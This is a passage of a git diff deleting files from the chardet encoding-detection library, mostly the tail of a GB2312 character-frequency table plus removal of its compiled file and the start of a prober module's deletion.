-3708, 135,2131, 87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530, -4314, 9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392, -3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656, -2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220, -2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766, -1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535, -3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728, -2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338, -1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627, -1505,1911,1883,3526, 698,3629,3456,1833,1431, 746, 77,1261,2017,2296,1977,1885, - 125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411, -2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671, -2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162, -3192,2910,2010, 140,2395,2859, 55,1082,2012,2901, 662, 419,2081,1438, 680,2774, -4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524, -3399, 98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346, - 180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040, -3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188, -2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280, -1086,1974,2034, 630, 257,3338,2788,4903,1017, 86,4790, 966,2789,1995,1696,1131, - 259,3095,4188,1308, 179,1463,5257, 289,4107,1248, 42,3413,1725,2288, 896,1947, - 774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970, -3034,3310, 540,2370,1562,1288,2990, 502,4765,1147, 4,1853,2708, 207, 294,2814, -4078,2902,2509, 684, 34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557, -2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997, -1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972, -1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369, - 766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376, -1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196, 19, 941,3624,3480, -3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610, - 955,1089,3103,1053, 96, 88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128, - 642,4006, 903,2539,1877,2082, 596, 29,4066,1790, 722,2157, 130, 995,1569, 769, -1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445, 50, 625, 487,2207, - 57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392, -1783, 362, 8,3433,3422, 610,2793,3277,1390,1284,1654, 21,3823, 734, 367, 623, - 193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782, -2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650, - 158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478, -2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773, -2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007, -1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323, -1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598, -2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961, - 819,1541, 142,2284, 44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302, -1063,5694, 624, 723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409, -1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683, -2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191, -2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434, 92,1466,4920,2616, -3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302, -1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774, -4462, 64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147, - 571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731, - 845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464, -3264,2855,2722,1952,1029,2839,2467, 84,4383,2215, 820,1391,2015,2448,3672, 377, -1948,2168, 797,2545,3536,2578,2645, 94,2874,1678, 405,1259,3071, 771, 546,1315, - 470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928, 14,2594, 557, -3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903, -1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060, -4031,2641,4067,3145,1870, 37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261, -1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092, -2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810, -1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708, - 498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658, -1178,2639,2351, 93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871, -3341,1618,4126,2595,2334, 603, 651, 69, 701, 268,2662,3411,2555,1380,1606, 503, - 448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229, -2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112, - 136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504, -1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389, -1281, 52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169, 27, -1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542, -3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861, -2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845, -3891,2868,3621,2254, 58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700, -3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469, -3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582, - 996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999, -2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274, - 786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020, -2724,1927,2333,4440, 567, 22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601, - 12, 974,3783,4391, 951,1412, 1,3720, 453,4608,4041, 528,1041,1027,3230,2628, -1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040, 31, - 475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668, - 233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778, -1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169, -3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667, -3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118, 63,2076, 314,1881, -1348,1061, 172, 978,3515,1747, 532, 511,3970, 6, 601, 905,2699,3300,1751, 276, -1467,3725,2668, 65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320, -3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751, -2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432, -2754, 95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772, -1985, 244,2546, 474, 495,1046,2611,1851,2061, 71,2089,1675,2590, 742,3758,2843, -3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116, - 451, 3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904, -4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652, -1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664, -2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078, 49,3770, -3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283, -3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626, -1197,1663,4476,3127, 85,4240,2528, 25,1111,1181,3673, 407,3470,4561,2679,2713, - 768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333, - 391,2963, 187, 61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062, -2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555, - 931, 317,2517,3027, 325, 569, 686,2107,3084, 60,1042,1333,2794, 264,3177,4014, -1628, 258,3712, 7,4464,1176,1043,1778, 683, 114,1975, 78,1492, 383,1886, 510, - 386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015, -1282,1289,4609, 697,1453,3044,2666,3611,1856,2412, 54, 719,1330, 568,3778,2459, -1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390, -1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238, -1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421, 56,1908,1640,2387,2232, -1917,1874,2477,4921, 148, 83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624, - 381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189, - 852,1221,1400,1486, 882,2299,4036, 351, 28,1122, 700,6479,6480,6481,6482,6483, # last 512 -#Everything below is of no interest for detection purpose -5508,6484,3900,3414,3974,4441,4024,3537,4037,5628,5099,3633,6485,3148,6486,3636, -5509,3257,5510,5973,5445,5872,4941,4403,3174,4627,5873,6276,2286,4230,5446,5874, -5122,6102,6103,4162,5447,5123,5323,4849,6277,3980,3851,5066,4246,5774,5067,6278, -3001,2807,5695,3346,5775,5974,5158,5448,6487,5975,5976,5776,3598,6279,5696,4806, -4211,4154,6280,6488,6489,6490,6281,4212,5037,3374,4171,6491,4562,4807,4722,4827, -5977,6104,4532,4079,5159,5324,5160,4404,3858,5359,5875,3975,4288,4610,3486,4512, -5325,3893,5360,6282,6283,5560,2522,4231,5978,5186,5449,2569,3878,6284,5401,3578, -4415,6285,4656,5124,5979,2506,4247,4449,3219,3417,4334,4969,4329,6492,4576,4828, -4172,4416,4829,5402,6286,3927,3852,5361,4369,4830,4477,4867,5876,4173,6493,6105, -4657,6287,6106,5877,5450,6494,4155,4868,5451,3700,5629,4384,6288,6289,5878,3189, -4881,6107,6290,6495,4513,6496,4692,4515,4723,5100,3356,6497,6291,3810,4080,5561, -3570,4430,5980,6498,4355,5697,6499,4724,6108,6109,3764,4050,5038,5879,4093,3226, -6292,5068,5217,4693,3342,5630,3504,4831,4377,4466,4309,5698,4431,5777,6293,5778, -4272,3706,6110,5326,3752,4676,5327,4273,5403,4767,5631,6500,5699,5880,3475,5039, -6294,5562,5125,4348,4301,4482,4068,5126,4593,5700,3380,3462,5981,5563,3824,5404, -4970,5511,3825,4738,6295,6501,5452,4516,6111,5881,5564,6502,6296,5982,6503,4213, -4163,3454,6504,6112,4009,4450,6113,4658,6297,6114,3035,6505,6115,3995,4904,4739, -4563,4942,4110,5040,3661,3928,5362,3674,6506,5292,3612,4791,5565,4149,5983,5328, -5259,5021,4725,4577,4564,4517,4364,6298,5405,4578,5260,4594,4156,4157,5453,3592, -3491,6507,5127,5512,4709,4922,5984,5701,4726,4289,6508,4015,6116,5128,4628,3424, -4241,5779,6299,4905,6509,6510,5454,5702,5780,6300,4365,4923,3971,6511,5161,3270, -3158,5985,4100, 867,5129,5703,6117,5363,3695,3301,5513,4467,6118,6512,5455,4232, -4242,4629,6513,3959,4478,6514,5514,5329,5986,4850,5162,5566,3846,4694,6119,5456, -4869,5781,3779,6301,5704,5987,5515,4710,6302,5882,6120,4392,5364,5705,6515,6121, -6516,6517,3736,5988,5457,5989,4695,2457,5883,4551,5782,6303,6304,6305,5130,4971, -6122,5163,6123,4870,3263,5365,3150,4871,6518,6306,5783,5069,5706,3513,3498,4409, -5330,5632,5366,5458,5459,3991,5990,4502,3324,5991,5784,3696,4518,5633,4119,6519, -4630,5634,4417,5707,4832,5992,3418,6124,5993,5567,4768,5218,6520,4595,3458,5367, -6125,5635,6126,4202,6521,4740,4924,6307,3981,4069,4385,6308,3883,2675,4051,3834, -4302,4483,5568,5994,4972,4101,5368,6309,5164,5884,3922,6127,6522,6523,5261,5460, -5187,4164,5219,3538,5516,4111,3524,5995,6310,6311,5369,3181,3386,2484,5188,3464, -5569,3627,5708,6524,5406,5165,4677,4492,6312,4872,4851,5885,4468,5996,6313,5709, -5710,6128,2470,5886,6314,5293,4882,5785,3325,5461,5101,6129,5711,5786,6525,4906, -6526,6527,4418,5887,5712,4808,2907,3701,5713,5888,6528,3765,5636,5331,6529,6530, -3593,5889,3637,4943,3692,5714,5787,4925,6315,6130,5462,4405,6131,6132,6316,5262, -6531,6532,5715,3859,5716,5070,4696,5102,3929,5788,3987,4792,5997,6533,6534,3920, -4809,5000,5998,6535,2974,5370,6317,5189,5263,5717,3826,6536,3953,5001,4883,3190, -5463,5890,4973,5999,4741,6133,6134,3607,5570,6000,4711,3362,3630,4552,5041,6318, -6001,2950,2953,5637,4646,5371,4944,6002,2044,4120,3429,6319,6537,5103,4833,6538, -6539,4884,4647,3884,6003,6004,4758,3835,5220,5789,4565,5407,6540,6135,5294,4697, -4852,6320,6321,3206,4907,6541,6322,4945,6542,6136,6543,6323,6005,4631,3519,6544, -5891,6545,5464,3784,5221,6546,5571,4659,6547,6324,6137,5190,6548,3853,6549,4016, -4834,3954,6138,5332,3827,4017,3210,3546,4469,5408,5718,3505,4648,5790,5131,5638, -5791,5465,4727,4318,6325,6326,5792,4553,4010,4698,3439,4974,3638,4335,3085,6006, -5104,5042,5166,5892,5572,6327,4356,4519,5222,5573,5333,5793,5043,6550,5639,5071, -4503,6328,6139,6551,6140,3914,3901,5372,6007,5640,4728,4793,3976,3836,4885,6552, -4127,6553,4451,4102,5002,6554,3686,5105,6555,5191,5072,5295,4611,5794,5296,6556, -5893,5264,5894,4975,5466,5265,4699,4976,4370,4056,3492,5044,4886,6557,5795,4432, -4769,4357,5467,3940,4660,4290,6141,4484,4770,4661,3992,6329,4025,4662,5022,4632, -4835,4070,5297,4663,4596,5574,5132,5409,5895,6142,4504,5192,4664,5796,5896,3885, -5575,5797,5023,4810,5798,3732,5223,4712,5298,4084,5334,5468,6143,4052,4053,4336, -4977,4794,6558,5335,4908,5576,5224,4233,5024,4128,5469,5225,4873,6008,5045,4729, -4742,4633,3675,4597,6559,5897,5133,5577,5003,5641,5719,6330,6560,3017,2382,3854, -4406,4811,6331,4393,3964,4946,6561,2420,3722,6562,4926,4378,3247,1736,4442,6332, -5134,6333,5226,3996,2918,5470,4319,4003,4598,4743,4744,4485,3785,3902,5167,5004, -5373,4394,5898,6144,4874,1793,3997,6334,4085,4214,5106,5642,4909,5799,6009,4419, -4189,3330,5899,4165,4420,5299,5720,5227,3347,6145,4081,6335,2876,3930,6146,3293, -3786,3910,3998,5900,5300,5578,2840,6563,5901,5579,6147,3531,5374,6564,6565,5580, -4759,5375,6566,6148,3559,5643,6336,6010,5517,6337,6338,5721,5902,3873,6011,6339, -6567,5518,3868,3649,5722,6568,4771,4947,6569,6149,4812,6570,2853,5471,6340,6341, -5644,4795,6342,6012,5723,6343,5724,6013,4349,6344,3160,6150,5193,4599,4514,4493, -5168,4320,6345,4927,3666,4745,5169,5903,5005,4928,6346,5725,6014,4730,4203,5046, -4948,3395,5170,6015,4150,6016,5726,5519,6347,5047,3550,6151,6348,4197,4310,5904, -6571,5581,2965,6152,4978,3960,4291,5135,6572,5301,5727,4129,4026,5905,4853,5728, -5472,6153,6349,4533,2700,4505,5336,4678,3583,5073,2994,4486,3043,4554,5520,6350, -6017,5800,4487,6351,3931,4103,5376,6352,4011,4321,4311,4190,5136,6018,3988,3233, -4350,5906,5645,4198,6573,5107,3432,4191,3435,5582,6574,4139,5410,6353,5411,3944, -5583,5074,3198,6575,6354,4358,6576,5302,4600,5584,5194,5412,6577,6578,5585,5413, -5303,4248,5414,3879,4433,6579,4479,5025,4854,5415,6355,4760,4772,3683,2978,4700, -3797,4452,3965,3932,3721,4910,5801,6580,5195,3551,5907,3221,3471,3029,6019,3999, -5908,5909,5266,5267,3444,3023,3828,3170,4796,5646,4979,4259,6356,5647,5337,3694, -6357,5648,5338,4520,4322,5802,3031,3759,4071,6020,5586,4836,4386,5048,6581,3571, -4679,4174,4949,6154,4813,3787,3402,3822,3958,3215,3552,5268,4387,3933,4950,4359, -6021,5910,5075,3579,6358,4234,4566,5521,6359,3613,5049,6022,5911,3375,3702,3178, -4911,5339,4521,6582,6583,4395,3087,3811,5377,6023,6360,6155,4027,5171,5649,4421, -4249,2804,6584,2270,6585,4000,4235,3045,6156,5137,5729,4140,4312,3886,6361,4330, -6157,4215,6158,3500,3676,4929,4331,3713,4930,5912,4265,3776,3368,5587,4470,4855, -3038,4980,3631,6159,6160,4132,4680,6161,6362,3923,4379,5588,4255,6586,4121,6587, -6363,4649,6364,3288,4773,4774,6162,6024,6365,3543,6588,4274,3107,3737,5050,5803, -4797,4522,5589,5051,5730,3714,4887,5378,4001,4523,6163,5026,5522,4701,4175,2791, -3760,6589,5473,4224,4133,3847,4814,4815,4775,3259,5416,6590,2738,6164,6025,5304, -3733,5076,5650,4816,5590,6591,6165,6592,3934,5269,6593,3396,5340,6594,5804,3445, -3602,4042,4488,5731,5732,3525,5591,4601,5196,6166,6026,5172,3642,4612,3202,4506, -4798,6366,3818,5108,4303,5138,5139,4776,3332,4304,2915,3415,4434,5077,5109,4856, -2879,5305,4817,6595,5913,3104,3144,3903,4634,5341,3133,5110,5651,5805,6167,4057, -5592,2945,4371,5593,6596,3474,4182,6367,6597,6168,4507,4279,6598,2822,6599,4777, -4713,5594,3829,6169,3887,5417,6170,3653,5474,6368,4216,2971,5228,3790,4579,6369, -5733,6600,6601,4951,4746,4555,6602,5418,5475,6027,3400,4665,5806,6171,4799,6028, -5052,6172,3343,4800,4747,5006,6370,4556,4217,5476,4396,5229,5379,5477,3839,5914, -5652,5807,4714,3068,4635,5808,6173,5342,4192,5078,5419,5523,5734,6174,4557,6175, -4602,6371,6176,6603,5809,6372,5735,4260,3869,5111,5230,6029,5112,6177,3126,4681, -5524,5915,2706,3563,4748,3130,6178,4018,5525,6604,6605,5478,4012,4837,6606,4534, -4193,5810,4857,3615,5479,6030,4082,3697,3539,4086,5270,3662,4508,4931,5916,4912, -5811,5027,3888,6607,4397,3527,3302,3798,2775,2921,2637,3966,4122,4388,4028,4054, -1633,4858,5079,3024,5007,3982,3412,5736,6608,3426,3236,5595,3030,6179,3427,3336, -3279,3110,6373,3874,3039,5080,5917,5140,4489,3119,6374,5812,3405,4494,6031,4666, -4141,6180,4166,6032,5813,4981,6609,5081,4422,4982,4112,3915,5653,3296,3983,6375, -4266,4410,5654,6610,6181,3436,5082,6611,5380,6033,3819,5596,4535,5231,5306,5113, -6612,4952,5918,4275,3113,6613,6376,6182,6183,5814,3073,4731,4838,5008,3831,6614, -4888,3090,3848,4280,5526,5232,3014,5655,5009,5737,5420,5527,6615,5815,5343,5173, -5381,4818,6616,3151,4953,6617,5738,2796,3204,4360,2989,4281,5739,5174,5421,5197, -3132,5141,3849,5142,5528,5083,3799,3904,4839,5480,2880,4495,3448,6377,6184,5271, -5919,3771,3193,6034,6035,5920,5010,6036,5597,6037,6378,6038,3106,5422,6618,5423, -5424,4142,6619,4889,5084,4890,4313,5740,6620,3437,5175,5307,5816,4199,5198,5529, -5817,5199,5656,4913,5028,5344,3850,6185,2955,5272,5011,5818,4567,4580,5029,5921, -3616,5233,6621,6622,6186,4176,6039,6379,6380,3352,5200,5273,2908,5598,5234,3837, -5308,6623,6624,5819,4496,4323,5309,5201,6625,6626,4983,3194,3838,4167,5530,5922, -5274,6381,6382,3860,3861,5599,3333,4292,4509,6383,3553,5481,5820,5531,4778,6187, -3955,3956,4324,4389,4218,3945,4325,3397,2681,5923,4779,5085,4019,5482,4891,5382, -5383,6040,4682,3425,5275,4094,6627,5310,3015,5483,5657,4398,5924,3168,4819,6628, -5925,6629,5532,4932,4613,6041,6630,4636,6384,4780,4204,5658,4423,5821,3989,4683, -5822,6385,4954,6631,5345,6188,5425,5012,5384,3894,6386,4490,4104,6632,5741,5053, -6633,5823,5926,5659,5660,5927,6634,5235,5742,5824,4840,4933,4820,6387,4859,5928, -4955,6388,4143,3584,5825,5346,5013,6635,5661,6389,5014,5484,5743,4337,5176,5662, -6390,2836,6391,3268,6392,6636,6042,5236,6637,4158,6638,5744,5663,4471,5347,3663, -4123,5143,4293,3895,6639,6640,5311,5929,5826,3800,6189,6393,6190,5664,5348,3554, -3594,4749,4603,6641,5385,4801,6043,5827,4183,6642,5312,5426,4761,6394,5665,6191, -4715,2669,6643,6644,5533,3185,5427,5086,5930,5931,5386,6192,6044,6645,4781,4013, -5745,4282,4435,5534,4390,4267,6045,5746,4984,6046,2743,6193,3501,4087,5485,5932, -5428,4184,4095,5747,4061,5054,3058,3862,5933,5600,6646,5144,3618,6395,3131,5055, -5313,6396,4650,4956,3855,6194,3896,5202,4985,4029,4225,6195,6647,5828,5486,5829, -3589,3002,6648,6397,4782,5276,6649,6196,6650,4105,3803,4043,5237,5830,6398,4096, -3643,6399,3528,6651,4453,3315,4637,6652,3984,6197,5535,3182,3339,6653,3096,2660, -6400,6654,3449,5934,4250,4236,6047,6401,5831,6655,5487,3753,4062,5832,6198,6199, -6656,3766,6657,3403,4667,6048,6658,4338,2897,5833,3880,2797,3780,4326,6659,5748, -5015,6660,5387,4351,5601,4411,6661,3654,4424,5935,4339,4072,5277,4568,5536,6402, -6662,5238,6663,5349,5203,6200,5204,6201,5145,4536,5016,5056,4762,5834,4399,4957, -6202,6403,5666,5749,6664,4340,6665,5936,5177,5667,6666,6667,3459,4668,6404,6668, -6669,4543,6203,6670,4276,6405,4480,5537,6671,4614,5205,5668,6672,3348,2193,4763, -6406,6204,5937,5602,4177,5669,3419,6673,4020,6205,4443,4569,5388,3715,3639,6407, -6049,4058,6206,6674,5938,4544,6050,4185,4294,4841,4651,4615,5488,6207,6408,6051, -5178,3241,3509,5835,6208,4958,5836,4341,5489,5278,6209,2823,5538,5350,5206,5429, -6675,4638,4875,4073,3516,4684,4914,4860,5939,5603,5389,6052,5057,3237,5490,3791, -6676,6409,6677,4821,4915,4106,5351,5058,4243,5539,4244,5604,4842,4916,5239,3028, -3716,5837,5114,5605,5390,5940,5430,6210,4332,6678,5540,4732,3667,3840,6053,4305, -3408,5670,5541,6410,2744,5240,5750,6679,3234,5606,6680,5607,5671,3608,4283,4159, -4400,5352,4783,6681,6411,6682,4491,4802,6211,6412,5941,6413,6414,5542,5751,6683, -4669,3734,5942,6684,6415,5943,5059,3328,4670,4144,4268,6685,6686,6687,6688,4372, -3603,6689,5944,5491,4373,3440,6416,5543,4784,4822,5608,3792,4616,5838,5672,3514, -5391,6417,4892,6690,4639,6691,6054,5673,5839,6055,6692,6056,5392,6212,4038,5544, -5674,4497,6057,6693,5840,4284,5675,4021,4545,5609,6418,4454,6419,6213,4113,4472, -5314,3738,5087,5279,4074,5610,4959,4063,3179,4750,6058,6420,6214,3476,4498,4716, -5431,4960,4685,6215,5241,6694,6421,6216,6695,5841,5945,6422,3748,5946,5179,3905, -5752,5545,5947,4374,6217,4455,6423,4412,6218,4803,5353,6696,3832,5280,6219,4327, -4702,6220,6221,6059,4652,5432,6424,3749,4751,6425,5753,4986,5393,4917,5948,5030, -5754,4861,4733,6426,4703,6697,6222,4671,5949,4546,4961,5180,6223,5031,3316,5281, -6698,4862,4295,4934,5207,3644,6427,5842,5950,6428,6429,4570,5843,5282,6430,6224, -5088,3239,6060,6699,5844,5755,6061,6431,2701,5546,6432,5115,5676,4039,3993,3327, -4752,4425,5315,6433,3941,6434,5677,4617,4604,3074,4581,6225,5433,6435,6226,6062, -4823,5756,5116,6227,3717,5678,4717,5845,6436,5679,5846,6063,5847,6064,3977,3354, -6437,3863,5117,6228,5547,5394,4499,4524,6229,4605,6230,4306,4500,6700,5951,6065, -3693,5952,5089,4366,4918,6701,6231,5548,6232,6702,6438,4704,5434,6703,6704,5953, -4168,6705,5680,3420,6706,5242,4407,6066,3812,5757,5090,5954,4672,4525,3481,5681, -4618,5395,5354,5316,5955,6439,4962,6707,4526,6440,3465,4673,6067,6441,5682,6708, -5435,5492,5758,5683,4619,4571,4674,4804,4893,4686,5493,4753,6233,6068,4269,6442, -6234,5032,4705,5146,5243,5208,5848,6235,6443,4963,5033,4640,4226,6236,5849,3387, -6444,6445,4436,4437,5850,4843,5494,4785,4894,6709,4361,6710,5091,5956,3331,6237, -4987,5549,6069,6711,4342,3517,4473,5317,6070,6712,6071,4706,6446,5017,5355,6713, -6714,4988,5436,6447,4734,5759,6715,4735,4547,4456,4754,6448,5851,6449,6450,3547, -5852,5318,6451,6452,5092,4205,6716,6238,4620,4219,5611,6239,6072,4481,5760,5957, -5958,4059,6240,6453,4227,4537,6241,5761,4030,4186,5244,5209,3761,4457,4876,3337, -5495,5181,6242,5959,5319,5612,5684,5853,3493,5854,6073,4169,5613,5147,4895,6074, -5210,6717,5182,6718,3830,6243,2798,3841,6075,6244,5855,5614,3604,4606,5496,5685, -5118,5356,6719,6454,5960,5357,5961,6720,4145,3935,4621,5119,5962,4261,6721,6455, -4786,5963,4375,4582,6245,6246,6247,6076,5437,4877,5856,3376,4380,6248,4160,6722, -5148,6456,5211,6457,6723,4718,6458,6724,6249,5358,4044,3297,6459,6250,5857,5615, -5497,5245,6460,5498,6725,6251,6252,5550,3793,5499,2959,5396,6461,6462,4572,5093, -5500,5964,3806,4146,6463,4426,5762,5858,6077,6253,4755,3967,4220,5965,6254,4989, -5501,6464,4352,6726,6078,4764,2290,5246,3906,5438,5283,3767,4964,2861,5763,5094, -6255,6256,4622,5616,5859,5860,4707,6727,4285,4708,4824,5617,6257,5551,4787,5212, -4965,4935,4687,6465,6728,6466,5686,6079,3494,4413,2995,5247,5966,5618,6729,5967, -5764,5765,5687,5502,6730,6731,6080,5397,6467,4990,6258,6732,4538,5060,5619,6733, -4719,5688,5439,5018,5149,5284,5503,6734,6081,4607,6259,5120,3645,5861,4583,6260, -4584,4675,5620,4098,5440,6261,4863,2379,3306,4585,5552,5689,4586,5285,6735,4864, -6736,5286,6082,6737,4623,3010,4788,4381,4558,5621,4587,4896,3698,3161,5248,4353, -4045,6262,3754,5183,4588,6738,6263,6739,6740,5622,3936,6741,6468,6742,6264,5095, -6469,4991,5968,6743,4992,6744,6083,4897,6745,4256,5766,4307,3108,3968,4444,5287, -3889,4343,6084,4510,6085,4559,6086,4898,5969,6746,5623,5061,4919,5249,5250,5504, -5441,6265,5320,4878,3242,5862,5251,3428,6087,6747,4237,5624,5442,6266,5553,4539, -6748,2585,3533,5398,4262,6088,5150,4736,4438,6089,6267,5505,4966,6749,6268,6750, -6269,5288,5554,3650,6090,6091,4624,6092,5690,6751,5863,4270,5691,4277,5555,5864, -6752,5692,4720,4865,6470,5151,4688,4825,6753,3094,6754,6471,3235,4653,6755,5213, -5399,6756,3201,4589,5865,4967,6472,5866,6473,5019,3016,6757,5321,4756,3957,4573, -6093,4993,5767,4721,6474,6758,5625,6759,4458,6475,6270,6760,5556,4994,5214,5252, -6271,3875,5768,6094,5034,5506,4376,5769,6761,2120,6476,5253,5770,6762,5771,5970, -3990,5971,5557,5558,5772,6477,6095,2787,4641,5972,5121,6096,6097,6272,6763,3703, -5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978, -4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767) - diff --git a/chardet/chardet/gb2312freq.pyc b/chardet/chardet/gb2312freq.pyc deleted file mode 100644 index 4df57b1..0000000 Binary files a/chardet/chardet/gb2312freq.pyc and /dev/null differ diff --git a/chardet/chardet/gb2312prober.py b/chardet/chardet/gb2312prober.py deleted file mode 100644 index 643fe25..0000000 --- 